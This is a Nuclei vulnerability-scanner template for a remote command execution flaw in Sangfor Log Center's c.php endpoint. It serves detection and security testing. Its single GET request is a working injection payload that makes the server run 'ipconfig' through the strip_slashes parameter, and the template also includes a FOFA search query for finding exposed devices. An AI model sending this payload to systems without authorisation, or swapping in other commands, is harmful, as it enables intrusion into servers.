nuclei-templates/http/vulnerabilities/other/sangfor-cphp-rce.yaml

34 lines
1.0 KiB
YAML

id: sangfor-cphp-rce
info:
name: Sangfor Log Center - Remote Command Execution
author: DhiyaneshDk
severity: critical
reference:
- https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%B7%B1%E4%BF%A1%E6%9C%8D%20%E6%97%A5%E5%BF%97%E4%B8%AD%E5%BF%83%20c.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md?plain=1
metadata:
verified: true
max-request: 1
fofa-query: "isHighPerformance : !!SFIsHighPerformance"
tags: sangfor,rce
http:
- method: GET
path:
- "{{BaseURL}}/tool/log/c.php?strip_slashes=system&host=ipconfig"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Windows IP"
- "Log Helper"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100e6d8f6104dfef7f9c0290413c73ab2d8d03d46a1eada6b8dde28d8d911d75b34022100ee3c44e41379e2ae9af70d13c905604bc4509a362b1290eb8774eaf0b4f69a5d:922c64590222798bb761d5b6d8e72950